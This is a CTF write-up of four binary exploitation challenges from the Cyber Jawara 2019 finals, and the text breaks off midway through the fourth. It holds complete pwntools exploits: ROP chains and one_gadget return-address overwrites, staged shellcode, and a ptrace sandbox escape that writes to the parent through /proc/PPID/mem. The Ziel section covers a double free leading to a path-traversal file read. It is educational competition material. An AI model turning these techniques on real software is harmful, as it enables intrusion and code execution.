Cyber Jawara 2019 Finals Binary Exploitation Write Up

Untuk bahasa Indonesia, silakan klik link ini

English

On September 7th 2019, the qualifying round for the annual national security competition Cyber Jawara was held. My team ended up in position 13, however the amount of teams that pass to the finals is usually 10. However, this year luckily 16 teams were brought to the finals (whew).

During the finals, we were presented with 8 problems, 4 web hacking and 4 binary exploitation. In this post, I will be explaining how to solve the binary exploitation problems. All files can be found here.

Note

These problems were very difficult. I myself only solved 2 during the competition, but mostly due to not having the right environment to pwn the problems. All the challenges were running on Ubuntu 18.10, and in writing this post I too will be using Ubuntu 18.10. (During the CTF I was using Ubuntu 19.04)

1. Warshall

Upon running the binary, we are presented with a menu like the photo below. The program allows us to simulate a shortest path finding algorithm, through citys and roads that we can determine.

Example testcase:

A B 2
A C 5
B C 2

The shortest path between A and C should be 4. The algorithm used is the Floyd-Warshall algorithm, hence the name of the challenge.

== Shortest Path Finder ==

1) Add city
2) Build direct road
3) Find shortest path
4) Exit
> 1
City name: A
1) Add city
2) Build direct road
3) Find shortest path
4) Exit
> 1
City name: B
1) Add city
2) Build direct road
3) Find shortest path
4) Exit
> 1
City name: C
1) Add city
2) Build direct road
3) Find shortest path
4) Exit
> 2
Insert city 1: A
Insert city 2: B
Road distance (in km): 2
1) Add city
2) Build direct road
3) Find shortest path
4) Exit
> 2
Insert city 1: A
Insert city 2: C
Road distance (in km): 5
1) Add city
2) Build direct road
3) Find shortest path
4) Exit
> 2
Insert city 1: B
Insert city 2: C
Road distance (in km): 2
1) Add city
2) Build direct road
3) Find shortest path
4) Exit
> 3
Insert city 1: A
Insert city 2: C
Shortest path from A to C: 4km
1) Add city
2) Build direct road
3) Find shortest path
4) Exit
>

The Bug

Before going into the bug, it is best to know how the Floyd-Warshall algorithm works. You can read more about it here

The Floyd-Warshall algorithm in the program uses an array of size 100 to store the names of the cities, and an array of size 10000 to store the roads. The bug lies in the fact there is an overflow in the add city function:

printf("City name: ");
fgets(local_118,0x100,stdin);
strtok(local_118,"\n");
iVar1 = check_if_city_exists(local_118);
if (iVar1 < 0) {
  lVar2 = (long)num_of_city;
  num_of_city = num_of_city + 1;
  strcpy(&name_of_city + lVar2 * 0x100,local_118);
}
else {
  puts("City already exists!");
}

The program doesn’t check whether or not 100 cities have been added. This itself doesn’t lead to any information leaks or writes, but it does lead to the second bug, which is an overflow in the roads array. Unlike the name_of_city array, The roads array is located in the stack. Since we can get an overflow, we can overwrite the return address of the handle function to gain RCE.

Information leak

Before I continue, I must state that during the CTF I jumped to the system function in order to gain RCE. I tried beforehand to use a libc one_gadget, but for some reason (I was just dumb, it wasn’t because of the constraints), it wasn’t working. Later in the second challenge, it did work.

Since the protection PIE was activated, we need a executable area leak. Since the handle function is called by the main function, its return address is a part of the executable area. With an executable area leak, we can easily get a libc leak with the puts PLT, and then jump to system.

An information leak can be gotten using the “find shortest path” function. Since every undefined road between cities was set to have infinite length (technically), the return address should most of the time have a shorter length compared to undefined roads. See below:

printf("Insert city 1: ");
fgets(local_218,0x100,stdin);
strtok(local_218,"\n");
iVar1 = check_if_city_exists(local_218);
if (iVar1 == -1) {
  puts("City not exists!");
}
else {
  printf("Insert city 2: ");
  fgets(local_118,0x100,stdin);
  strtok(local_118,"\n");
  iVar2 = check_if_city_exists(local_118);
  if (iVar2 == -1) {
    puts("City not exists!");
  }
  else {
    if (road_array[(long)iVar1 * 100 + (long)iVar2] == 1000000000) {
      printf("No path from %s to %s\n",local_218,local_118);
    }
    printf("Shortest path from %s to %s: %dkm\n",local_218,local_118,
           (ulong)road_array[(long)iVar1 * 100 + (long)iVar2]);
  }
}

There is no check whether or not the iVar1 or iVar2 is less than 100, thus with a specific input we can get the return address value. Note: The shortest path was represented as a 32-bit integer, thus we need to leak 2 times

list_names = []
for i in range(100):
  list_names.append(''.join([random.choice(string.ascii_lowercase) for j in range(10)]))
  create_city(list_names[i])

# Overflow
create_city('pwner')


## EXEC LEAK
short_path('pwner', list_names[51])
p.recvuntil(": ")
l = struct.pack("<i", int(p.recvuntil("km")[:-2]))[::-1].encode('hex')

short_path('pwner', list_names[50])
p.recvuntil(": ")
l +=  struct.pack("<i", int(p.recvuntil("km")[:-2]))[::-1].encode('hex')

l = int(l, 16)
exec_base = l - 0x96b
print "EXEC BASE LEAK"
print hex(exec_base)

Error

Writing the ROP chain

The “Build direct road” function allows us to write values into the road array. Since we can overflow into the return address (without affecting the stack canary), we can also write values that we need into it.

We need to write two chains, one to call puts with puts got as the parameter (to get libc leak), and another to call system and get full RCE.

Note: In my experience, ever since libc 2.27, the second parameter of the system function must be set to NULL in order to call system without a segmentation fault. That is why there are multiple zeros put into the ropchain.

Below is my full exploit:

from pwn import *
import string
import random

p = process('./warshall')

def create_city(name):
  p.sendlineafter('>', '1')
  p.sendlineafter('name:', name)

def build_road(city1, city2, distance):
  p.sendlineafter('>', '2')
  p.sendlineafter('1:', city1)
  p.sendlineafter('2:', city2)
  p.sendlineafter('):', distance)

def short_path(city1, city2):
  p.sendlineafter('>', '3')
  p.sendlineafter('1:', city1)
  p.sendlineafter('2:', city2)

def end():
  p.sendlineafter('>', '4')

list_names = []
for i in range(100):
  list_names.append(''.join([random.choice(string.ascii_lowercase) for j in range(10)]))
  create_city(list_names[i])

# Overflow
create_city('pwner')


## EXEC LEAK
short_path('pwner', list_names[51])
p.recvuntil(": ")
l = struct.pack("<i", int(p.recvuntil("km")[:-2]))[::-1].encode('hex')

short_path('pwner', list_names[50])
p.recvuntil(": ")
l +=  struct.pack("<i", int(p.recvuntil("km")[:-2]))[::-1].encode('hex')

l = int(l, 16)
exec_base = l - 0x96b
print "EXEC BASE LEAK"
print hex(exec_base)

pop_rdi = exec_base + 0x1273
pop_rsi_r15 = exec_base + 0x1271
just_ret = exec_base + 0x1274
main = exec_base + 0x11f1
puts_got = exec_base + 0x201f98
puts_plt = exec_base + 0x790


# WRITE TIME

build_road('pwner', list_names[6], str(pop_rdi & 0xffffffff))
build_road('pwner', list_names[7], str((pop_rdi>>32) & 0xffffffff))

build_road('pwner', list_names[8], str(puts_got & 0xffffffff))
build_road('pwner', list_names[9], str((puts_got>>32) & 0xffffffff))

build_road('pwner', list_names[10], str(puts_plt & 0xffffffff))
build_road('pwner', list_names[11], str((puts_plt>>32) & 0xffffffff))

build_road('pwner', list_names[12], str(main & 0xffffffff))
build_road('pwner', list_names[13], str((main>>32) & 0xffffffff))

end()

## LIBC LEAK
l = int(p.recvuntil('\x7f')[-6:][::-1].encode('hex'), 16)

libc_base = l - 0x81010
system_address = libc_base + 0x50300
bin_sh_address = libc_base + 0x1aae80

print hex(system_address)



build_road('pwner', list_names[6], str(pop_rdi & 0xffffffff))
build_road('pwner', list_names[7], str((pop_rdi>>32) & 0xffffffff))

build_road('pwner', list_names[8], str(bin_sh_address & 0xffffffff))
build_road('pwner', list_names[9], str((bin_sh_address>>32) & 0xffffffff))

build_road('pwner', list_names[10], str(pop_rsi_r15 & 0xffffffff))
build_road('pwner', list_names[11], str((pop_rsi_r15>>32) & 0xffffffff))

build_road('pwner', list_names[12], str(0))
build_road('pwner', list_names[13], str(0))
build_road('pwner', list_names[14], str(0))
build_road('pwner', list_names[15], str(0))

build_road('pwner', list_names[16], str(system_address & 0xffffffff))
build_road('pwner', list_names[17], str((system_address>>32) & 0xffffffff))

end()

p.interactive()
p.close()

Error

2. Midas

Midas was probably the challenge I hated the most. The problem was based on the coin change problem, where we can specify what coins we have and the amount we wish to calculate. The program will print the number of ways to achieve said amount using the coins we inputted.

== MIDAS - How many ways we can make the change? ==

1) Init coins
2) Compute
3) Exit
Choice: 1
Number of coins: 3
Insert nominal 1: 1
Insert nominal 2: 3
Insert nominal 3: 4

1) Init coins
2) Compute
3) Exit
Choice: 2
Insert desired value: 6
We can change 6 with 4 ways

1) Init coins
2) Compute
3) Exit
Choice:

The Bug

Before going into the bug, it is best to know how the coin change algorithm works. You can read more about it here

Below is the decompilation of handler.

undefined coins [1200];
undefined amounts [12008];
puts("== MIDAS - How many ways we can make the change? ==");
while( true ) {
    while( true ) {
        while( true ) {
            puts("");
            puts("1) Init coins");
            puts("2) Compute");
            puts("3) Exit");
            printf("Choice: ");
            choice = read_int();
            if (choice != 1) break;
            number_of_coins = input_coins(coins);
        }
        if (choice != 2) break;
        calculate_ways(coins,amounts,12000,(ulong)number_of_coins);
        }
    if (choice == 3) break;
    puts("Invalid Choice!");
}

As you can see, there are two functions that will be used in the coin change algorithm calculation. Below is the decompilation of both functions.

input_coins:

printf("Number of coins: ");
number_of_coins = read_int();
if ((int)number_of_coins < 0x12d) {
    i = 0;
    while (i < number_of_coins) {
        printf("Insert nominal %d: ",(ulong)(i + 1));
        nominal = read_int();
        if ((nominal < 1) || (3000 < nominal)) {
            printf("Please insert a number with valid range (1-%d)\n",3000);
            *(int *)((ulong)i * 4 + param_1) = nominal;
            if (*(int *)(param_1 + (ulong)i * 4) == 0) break;
        }
        else {
        *(int *)((ulong)i * 4 + param_1) = nominal;
        }
        i = i + 1;
    }
    return_value = (ulong)number_of_coins;
}
else {
    printf("Maximum number of coins is %d!\n",300);
    return_value = 0;
}
return return_value;

calculate_ways:

memset(param_2,0,(ulong)param_3);
*param_2 = 1;
printf("Insert desired value: ");
value = read_int();
i = 0;
while (i < param_4) {
    j = *(uint *)(param_1 + (ulong)i * 4);
    while (j <= value) {
        param_2[j] = param_2[j - *(int *)(param_1 + (ulong)i * 4)] + param_2[j];
        j = j + 1;
    }
    i = i + 1;
}
printf("We can change %d with %d ways\n",(ulong)value,(ulong)(uint)param_2[value]);
return;

The maximum number of coins is 300, which is the exact amount ((1200)/4 == 300). So no overflow there. However, whats really interesting is the calculate_ways function. There is no bounds check so we can calculate the number of ways to achieve any amount. The result is stored at param_2(amounts array) + amount, so we have an out of bounds write.

With this out of bounds access we can get a exec leak, libc leak, and we can overwrite the return address of the handler function.

Information leak

In this challenge, I used a one_gadget in order to gain RCE. It turns out I just had bad offsets in the last challenge. Oh well ¯\_(ツ)_/¯.

In order to get a exec leak, all I did was run the calculate ways function twice, at offset 3006 and 3007. This is the return value of the handler function. Since it’s meant to return to main, it’s value is an executable area address.

Exec leak actually isn’t important when I want to run a libc value, but I got it anyways. A libc leak can be achieve in the same way but using offset’s 3010 and 3011

    compute(3011)
    p.recvuntil("with ")
    l = struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')

    compute(3010)
    p.recvuntil("with ")
    l += struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')
    l = int(l, 16)
    print hex(l)

    libc_base = l - 0x2409b
    one_gadget = libc_base + 0x50186


    compute(3007)
    p.recvuntil("with ")
    l = struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')

    compute(3006)
    p.recvuntil("with ")
    l += struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')
    l = int(l, 16)
    print hex(l)

    exec_leak = l

Error

Overwriting return address

This part was the hard part. Since I’m not that amazing at algorithms, I just did trial and error for a while until I found a good way to write values. After awhile I noticed that the memset doesn’t reset the return address (duh), so instead of one big write I could slowly add values until I I’m satisfied. I have to use factors of 3006 and 3007, and adding more than one coin of it’s factor helps to increase value’s faster.

It was truly brute force heavy, I wish I could’ve studied algorithms a bit more :(

Here’s is my full exploit. Mind the while(True), I used that because I hoped the address between the one_gadget and the exec leak would be positive small (i.e. less than 300000000).

from pwn import *



def init_coins(num, coins):
  p.sendlineafter("Choice:", '1')
  p.sendlineafter("coins:", str(num))
  for i in coins:
    p.sendlineafter(":", str(i))

def compute(num):
  p.sendlineafter("Choice:", '2')
  p.sendlineafter("value:", str(num))

def end():
  p.sendlineafter("Choice:", '3')


while(True):
  p = process('./midas')
  compute(3011)
  p.recvuntil("with ")
  l = struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')

  compute(3010)
  p.recvuntil("with ")
  l += struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')
  l = int(l, 16)
  print hex(l)

  libc_base = l - 0x2409b
  one_gadget = libc_base + 0x50186


  compute(3007)
  p.recvuntil("with ")
  l = struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')

  compute(3006)
  p.recvuntil("with ")
  l += struct.pack("<i", int(p.recvuntil("ways")[:-4]))[::-1].encode('hex')
  l = int(l, 16)
  print hex(l)

  exec_leak = l


  one_gadget_part_1 = one_gadget & 0xffffffff
  ret_address_part_1 = exec_leak & 0xffffffff
  one_gadget_part_2 = (one_gadget>>32) & 0xffffffff
  ret_address_part_2 = (exec_leak>>32) & 0xffffffff


  temp = (one_gadget_part_1 - ret_address_part_1)
  print temp

  if(temp > 300000000 or temp < 0):
    p.close()
    continue
  init_coins(4, [9 for i in range(4)])
  while(one_gadget_part_1 > ret_address_part_1 + 6322120):
    compute(3006)
    ret_address_part_1 += 6322120

  print "HOPE"

  init_coins(3, [9 for i in range(3)])
  while(one_gadget_part_1 > ret_address_part_1 + 56280):
    compute(3006)
    ret_address_part_1 += 56280

  print "HOPE"

  init_coins(2, [9 for i in range(2)])
  while(one_gadget_part_1 > ret_address_part_1 + 335):
    compute(3006)
    ret_address_part_1 += 335

  print "HOPE"

  init_coins(1, [9])
  while(one_gadget_part_1 != ret_address_part_1):
    compute(3006)
    ret_address_part_1 += 1

  print "HOPE"

  init_coins(2, [31 for i in range(2)])
  while(one_gadget_part_2 > ret_address_part_2 + 98):
    compute(3007)
    ret_address_part_2 += 98

  print "HOPE"

  init_coins(1, [31])
  while(one_gadget_part_2 != ret_address_part_2):
    compute(3007)
    ret_address_part_2 += 1

  end()
  p.interactive()
  p.close()

Error

Yay!

3. Kreis

Before I continue, for the last two problems I will base my solution according to this list:
* Flag is not read protected and it’s name is flag/flag.txt
* Flag is not read protected and it’s name is random
* Flag is read protected, must get RCE.

Kreis was a shellcode based sandbox problem. Decompilation of the binary is as below.

void main(void)

{
  code *__addr;
  
  setup();
  puts("Shellcode:");
  __addr = (code *)mmap((void *)0x0,0xb,7,0x21,-1,0);
  fgets((char *)__addr,0xb,stdin);
  mprotect(__addr,0xb,5);
  (*__addr)();
                    /* WARNING: Subroutine does not return */
  exit(0);
}

As you can see, initially the binary mmaps a random location with rwx permissions. We can write up to 10 bytes into it, and then the protection changes with mprotect to r-x. This means we have 10 bytes of shellcode we can abuse.

10 bytes isn’t much, so my first goal was to find a way to enter more shellcode. By looking into the registers right before my shellcode is called, I see r12 has a very specific value

Error

0x4005f0 is the value of _start, which is very useful for us, this means we have a way to jump back into the beginning of the binary in order to create another 10 bytes of shellcode. Since I didn’t want to pollute the stack too much (I use the stack later), I decided to change the value of r12 to main, which is at offset 0x10c from _start. Then all I have to do is jump back into main. So, this is my first payload (The 10 at the top left is the length of shellcode):

10
   0:   49 81 c4 0c 01 00 00    add    r12, 0x10c
   7:   41 54                   push   r12
   9:   c3                      ret

Now that we can write infinitly many shellcodes of length 10, how do we get more? I broke this problem down into two parts, getting a larger rwx memory location, writing to it and then jumping to it.

Mprotect

Since the main function has a call to mprotect, the function in question should be in the the PLT.

Error

The PLT is behind _start, so we need to sub a register. Besides r12, it seems r13, r14, and r15 all do not change values from our loop. So I moved r12’s value to r13, and subbed it with the correct offset.

6
   0:   41 54                   push   r12
   2:   4d 89 e5                mov    r13, r12
   5:   c3                      ret
10
   0:   41 54                   push   r12
   2:   49 81 ed f0 00 00 00    sub    r13, 0xf0
   9:   c3                      ret
7
   0:   41 54                   push   r12
   2:   49 83 ed 3c             sub    r13, 0x3c
   6:   c3                      ret

Now, all we need to do is setup the function parameters. Since this is a 64-bit binary, the function parameters are located in rdi, rsi, rdx, rcx, r8, and r9 respectively. We only need three, so I just need to setup rdi, rsi, and rdx. To accomplish this, I pushed the values into the stack and then popped them. The reason for that is because pop rdi, pop rsi, and pop rdx are instructions with a length of 1 byte.

8
   0:   58                      pop    rax
   1:   58                      pop    rax
   2:   58                      pop    rax
   3:   6a 07                   push   0x7
   5:   41 54                   push   r12
   7:   c3                      ret
10
   0:   58                      pop    rax
   1:   58                      pop    rax
   2:   5f                      pop    rdi
   3:   5e                      pop    rsi
   4:   5a                      pop    rdx
   5:   41 54                   push   r12
   7:   41 ff e5                jmp    r13

The pop rax’s were used to setup the stack in the perfect condition. This leads to a long rwx area.

Error

Writing to the new rwx memory

The way the binary calls the shellcode is as below.

00400753 48 89 c7        MOV        RDI,RAX
00400756 e8 55 fe        CALL       fgets    
         ff ff
0040075b 48 8b 45 f8     MOV        RAX,qword ptr [RBP + local_10]
0040075f ba 05 00        MOV        EDX,0x5
         00 00
00400764 be 0b 00        MOV        ESI,0xb
         00 00
00400769 48 89 c7        MOV        RDI,RAX
0040076c e8 5f fe        CALL       mprotect  
         ff ff
00400771 48 8b 55 f8     MOV        RDX,qword ptr [RBP + local_10]
00400775 b8 00 00        MOV        EAX,0x0
         00 00
0040077a ff d2           CALL       RDX

This means the address of the mmapped memory is in rdx. According to gdb, this value is close to the area we changed to rwx just before.

Error

So I moved this value into r13, and added r13 with the appropriate value.

6
   0:   41 54                   push   r12
   2:   49 89 d5                mov    r13, rdx
   5:   c3                      ret
10
   0:   41 54                   push   r12
   2:   49 81 c5 00 00 20 00    add    r13, 0x200000
   9:   c3                      ret

Now I just need to setup a read syscall with 10 bytes. Again, I used the stack to my advantage.

10
   0:   4c 89 ee                mov    rsi, r13
   3:   5a                      pop    rdx
   4:   5f                      pop    rdi
   5:   57                      push   rdi
   6:   0f 05                   syscall 
   8:   ff e6                   jmp    rsi

Now I can create an very long shellcode.

Sandbox

At this point, it may seem like creating an execve shellcode isn’t too far away, but I haven’t even talked about the sandbox binary. The challenge actually presents us with 2 binaries, kreis and sandbox. The binary I just talked about above was the kreis binary, however the service actually will run ./sandbox kreis. Here’s the decompilation of the main function in sandbox.

init(param_1);
if ((int)param_1 < 2) {
    fprintf(stderr,"Run: %s [program]\n",*param_2);
    uVar2 = 0xffffffff;
}
else {
    uVar1 = fork();
    if (uVar1 == 0) {
        run_target(param_2[1]);
    }
    else {
        if ((int)uVar1 < 1) {
        fwrite("Fork error",1,10,stderr);
        return 0xffffffff;
    }
    run_debugger((ulong)uVar1);
    }
    uVar2 = 0;
}
return uVar2;

fork is a function that clones the current process. Everything is the same between the parent and the child, except for a few exceptions. The return value that it gives is the child process ID for the parent, and 0 for the child. This means, the child will be the process that runs the run_target function.

Below is the decompilation of the run_target function

lVar1 = ptrace(PTRACE_TRACEME,0,0,0);
if (lVar1 < 0) {
    fwrite("Error ptrace\n",1,0xd,stderr);
}
else {
    execl(param_1,param_1,0);
}
return;

Since the argv[1] is kreis, the child process will be running kreis.

There is also a run_debugger function which basically tracks how the child process is running. This is done by setting up ptrace and waitpid functions. The most notable is this block of code.

    if ((local_f8 & 0xff) != 0x7f) goto LAB_00100d63;
    uVar1 = (int)local_f8 >> 8;
    if ((uVar1 & 0xff) < 0x21) break;
    ptrace(PTRACE_GETREGS,(ulong)param_1,0,local_e8);
    local_ec = (int)local_70;
    if ((local_ec == 0x3b) || (local_ec == 0x142)) {
        puts("[Sandbox] Forbidden syscall detected. Kill the program.");
        kill_process((ulong)param_1);
LAB_00100d63:
        exit(0);
    }

This block of code tracks what syscall is being used the the ptraced process, and accordingly it blocks the 0x3b and 0x142 syscall. According to this, 0x3b is execve and 0x142 is execveat.

This means we can’t call execve and get RCE :(

According to the list above, I can only pass the first 2 lists elements:
✓ 1. Flag is not read protected and it’s name is flag/flag.txt
✓ 2. Flag is not read protected and it’s name is random
✗ 3. Flag is read protected, must get RCE.

Getting RCE

During my upsolve, I have tried multiply attempts to gain RCE. I’ll will be explaining all of them, and if I can, explain why they did work and didn’t work

1. Change to 32-bit mode (fail)
After searching online for possible seccomp bypasses, I stumbled accross this post. Basically, there is a way to invoke 32-bit syscalls in a 64-bit process. By abusing the retf instruction, we can change the cs register value as well as the instruction pointer. When the cs register has value 0x33, it means the process will run in 64-bit mode, while if the value is 0x23, the process can run in 32 bit mode. By mmaping in a 32-bit area of memory, we can setup this sort of shellcode.

Since in 32-bit the syscall value is 0xb instead of 0x3b, we should be able to invoke an execve shellcode and gain RCE. However, after setting this up, the ptrace still detects illegal syscall, and kills the process. My guess is that because the parent process is running in 64-bit mode, the syscall it reads is still 0x3b.

2. Use x32 ABI syscalls (fail)
Besides changing to 32-bit (x86) mode, we can also use another trick, which is the x32 ABI syscalls. I discovered this technique from this post, where he used x32’s open syscall to read the flag. The full x32 ABI syscall list can be found here. Note, the way to read that syscall list is 64 -> only x86-64, x32 -> only x32, common -> both x86-64 and x32

Combining what we know now, using 0x40000208, as the value for eax, execve should be invoked, and the parent process should catch it as 0x40000208. Sadly, this syscall doesn’t work on my docker environment. I’ll try to find a fix later.

3. Write to /proc/$pid/mem (success)
The last thing I tried was the /proc/$pid/mem file. This file (abstractly) contains the entire program memory of a certain process during runtime. This file is writable, which means we can write whatever we what to a certain processes program memory even during runtime. This way, we can write shellcode, change pointers, and many more just by writing to this file.

My idea was as so, write to the parent processes (this being the sandbox binary) program memory and call execve using a one_gadget.

First, we need to know what the parent processes PID is. This can be done by reading the /proc/self/stat file of the child process. The fourth number is the PPID (It’s actually the second, but lol it worked for me, atleast locally, I believe remotely it should be the second).

sc = '''
mov rax, 0
mov rdi, 0
mov rsi, r13
mov rdx, 0x1000
syscall
'''
sc += shellcraft.pushstr('/proc/self/stat')
sc += shellcraft.open('rsp', 0, 0)
sc += shellcraft.read('rax', 'rsp', 0x200)
sc += shellcraft.write(1, 'rsp', 0x200)

sc += '''
jmp r13
'''
shellcode = '\x90'*80 + asm(sc).ljust(0x200, '\x90')
p.sendline(shellcode)

## PPID LEAK
p.recvuntil('R ')
p.recvuntil(' ')
p.recvuntil(' ')
PPID = int(p.recvuntil(' '))
print PPID

Second, I need to get the parent processes memory mapping. This can be done by reading the /proc/$pid/maps file.

sc = '''
mov rax, 0
mov rdi, 0
mov rsi, r13
mov rdx, 0x1000
syscall
'''
sc += shellcraft.pushstr('/proc/{}/maps'.format(PPID))
sc += shellcraft.open('rsp', 0, 0)
sc += shellcraft.read('rax', 'rsp', 0xa00)
sc += shellcraft.write(1, 'rsp', 0xa00)

sc += '''
jmp r13
'''
shellcode = '\x90'*80 + asm(sc).ljust(0x200, '\x90')
p.sendline(shellcode)

p.recvuntil('sandbox')
sandbox_base = int(p.recvuntil('-')[:-1], 16)
offset_to_change = sandbox_base + 0xfb0
print hex(offset_to_change)
p.recvuntil('sandbox')
p.recvuntil('sandbox')
libc_base = int(p.recvuntil('-')[:-1], 16)
print hex(libc_base)

one_gadget = libc_base + 0x103f50

Third, open the /proc/$pid/mem file and write a one_gadget to the exit GOT. Call a forbidden syscall in the child, which should kill the child and execute exit, which in this case is the one gadget.

sc = '''
mov rax, 0
mov rdi, 0
mov rsi, r13
mov rdx, 0x1000
syscall
'''
sc += shellcraft.pushstr('/proc/{}/mem'.format(PPID))
sc += shellcraft.open('rsp', 2, 0)
sc += '''
mov r14, rax
mov rax, 8
mov rdi, r14
mov rsi, {}
mov rdx, 1
syscall

mov rdi, {}
push rdi
mov rax, r14
'''.format(offset_to_change, one_gadget)
sc += shellcraft.write('rax', 'rsp', 8)
sc += shellcraft.close('r14')
sc += '''
jmp r13
'''
shellcode = '\x90'*80 + asm(sc).ljust(0x200, '\x90')
p.sendline(shellcode)

Error

Success!

4. Ziel

Ziel was the last challenge that we were presented. Being the last one, it was also the hardest (Not really, kreis was harder :P). The program is a sort of life simulator, where we can spawn new life and it will “walk” in the set direction and set speed. When two lifeforms crash, they both die. There are lots more functions, you can download and try the program out for yourself here. The program is compiled with PIE on, so we have no indicator for where any data is located.

- World:
----------------------
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
----------------------
- Choose an action:
1. Next
2. Spawn
3. Kill
4. Save
5. Load
6. Restart
7. Quit
> 

With lifeforms:

- World:
----------------------
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                b   |
|                    |
|                    |
|                    |
|            a       |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
|                    |
----------------------
- Choose an action:
1. Next
2. Spawn
3. Kill
4. Save
5. Load
6. Restart
7. Quit
> 

The Bug

The bug is located in the kill function. Below is the decompilation of the kill function.

int kill(__pid_t __pid,int __sig)
{
  int iVar1;
  int iVar2;
  uint uVar3;
  
  puts("");
  puts("- Input location.");
  printf("X: ");
  iVar1 = read_int();
  printf("Y: ");
  iVar2 = read_int();
  if ((((iVar1 < 0) || (iVar2 < 0)) || (width <= iVar1)) || (height <= iVar2)) {
    uVar3 = puts("Invalid location.");
  }
  else {
    uVar3 = (uint)*(ushort *)(&temp_alive_dat + (long)(iVar1 + width * iVar2) * 2);
    if ((*(ushort *)(&temp_alive_dat + (long)(iVar1 + width * iVar2) * 2) != 2) &&
       (uVar3 = (uint)*(long *)(layout_addresses + (long)(iVar1 + width * iVar2) * 8),
       *(long *)(layout_addresses + (long)(iVar1 + width * iVar2) * 8) != 0)) {
      free(*(void **)(layout_addresses + (long)(iVar1 + width * iVar2) * 8));
      uVar3 = 0x5575b060;
      *(undefined2 *)(&temp_alive_dat + (long)(iVar1 + width * iVar2) * 2) = 2;
    }
  }
  return (int)uVar3;
}

Basically, the kill function free’s the memory in the heap, and marks the pointer with ‘2’ (which means dead). However, the pointer itself isn’t actually zeroed out until the user runs the next function. However, we can’t free the pointer twice since there is a check to prevent killing lifeforms that are already marked with ‘2’.

However, this check is not present in the restart function.

void restart(void)
{
  int local_c;
  
  puts("");
  puts("Restarting.");
  local_c = 0;
  while (local_c < 0x800) {
    if (*(long *)(layout_addresses + (long)local_c * 8) != 0) {
      free(*(void **)(layout_addresses + (long)local_c * 8));
      *(undefined8 *)(layout_addresses + (long)local_c * 8) = 0;
    }
    local_c = local_c + 1;
  }
  puts("Done.");
  puts("");
  return;
}

So, the kill function combined with the restart function leads to a double free’d pointer.

The save code

Before the menu prompt, there actually is a read save code prompt. Here’s an example:

============================================================
=                  World Simulator v3.0.5                  =
============================================================

- Input a save code. If you don't have any just press enter.
Save code: 

- Please set your world size.
Width: 

This prompt is called everytime the program is started and everytime the restart function is called. Below is the decompilation of reading the save code.

undefined8 get_save_file(void)
{
  int iVar1;
  char local_a;
  char local_9;
  
  puts("- Input a save code. If you don\'t have any just press enter.");
  printf("Save code: ");
  save_code = malloc(0x40);
  memcpy(save_code,"/tmp/",5);
  local_a = '\x05';
  while( true ) {
    iVar1 = getchar();
    local_9 = (char)iVar1;
    if (local_9 == '\n') {
      *(undefined *)((long)local_a + (long)save_code) = 0;
      return 1;
    }
    if (((local_9 < 'A') || ('z' < local_9)) || ((local_9 < 'a' && ('Z' < local_9)))) break;
    *(char *)((long)save_code + (long)local_a) = local_9;
    local_a = local_a + '\x01';
    if ('?' < local_a) {
      return 1;
    }
  }
  puts("Invalid save code. Only alphabets allowed.");
  puts("");
  while (local_9 != '\n') {
    iVar1 = getchar();
    local_9 = (char)iVar1;
  }
  free(save_code);
  return 0;
}

By default, the program creates a save code in which the save code will be located at /tmp/. The program also checks that the code name only has letters, no numbers or special characters. So, we cannot do directory traversal.

However, using the double free vulnerabity from before, we can abuse the save code.

Getting LFI read

You might be thinking, why not just abuse tcache and get RCE that way? Well, for one, the structure of a lifeform prohibits that from happening. Below is the roughly the structure of a lifeform.

struct lifeform
{
  char name; // yes a single char
  int vel_x;
  int vel_y;
  char[] desc; // this is not a pointer, it's the array of chars
};

As you can see, we can’t just change the fd pointer of a chunk right away, we need to find another way. Before that, LFI!

So let’s say we get a double free for the chunk size from malloc(0x40), how can that get us a local file inclusion read? Well, here is the decompilation of the save function.

void save(void)
{
  char *__filename;
  FILE *__stream;
  int local_20;
  int local_1c;
  
  __filename = (char *)malloc(0x40);
  memcpy(__filename,"/tmp/",5);
  local_1c = 5;
  local_20 = 0;
  while (local_20 < 0x800) {
    if (((*(long *)(layout_addresses + (long)local_20 * 8) != 0) &&
        ('\x1f' < **(char **)(layout_addresses + (long)local_20 * 8))) &&
       (**(char **)(layout_addresses + (long)local_20 * 8) != '\x7f')) {
      __filename[local_1c] = **(char **)(layout_addresses + (long)local_20 * 8);
      local_1c = local_1c + 1;
      if (0x3f < local_1c) break;
    }
    local_20 = local_20 + 1;
  }
  __filename[local_1c] = '\0';
  __stream = fopen(__filename,"w");
  if (__stream != (FILE *)0x0) {
    local_20 = 0;
    while (local_20 < 0x800) {
      if (((*(long *)(layout_addresses + (long)local_20 * 8) != 0) &&
          ('\x1f' < **(char **)(layout_addresses + (long)local_20 * 8))) &&
         (**(char **)(layout_addresses + (long)local_20 * 8) != '\x7f')) {
        if (**(char **)(layout_addresses + (long)local_20 * 8) == ' ') {
          fputc(0x20,__stream);
        }
        fputc((int)**(char **)(layout_addresses + (long)local_20 * 8),__stream);
      }
      local_20 = local_20 + 1;
    }
    fclose(__stream);
  }
  return;
}

Oh boy that looks messy, well to break it down, basically we can save to a file, and the filename is purely a combination of all the name’s of the current lifeforms we have. The maximum filename length is 0x40, and may only consist of characters in the range 0x20-0x7e (space until tilda), which means we can possibly do directory traversal. Another thing that is interesting is that the size of the malloc is the same size as the one used to create the initial save code.

Using the double free vulnerability, we can make the save code and the save function’d file point to the same chunk, thus pointing to the same string.

Below is the decompilation of the load function.

void load(void)
{
  char cVar1;
  int iVar2;
  FILE *__stream;
  void *pvVar3;
  int local_14;
  
  __stream = fopen(save_code,"r");
  if (__stream != (FILE *)0x0) {
    local_14 = 0;
    while( true ) {
      iVar2 = _IO_getc((_IO_FILE *)__stream);
      cVar1 = (char)iVar2;
      if (cVar1 == -1) break;
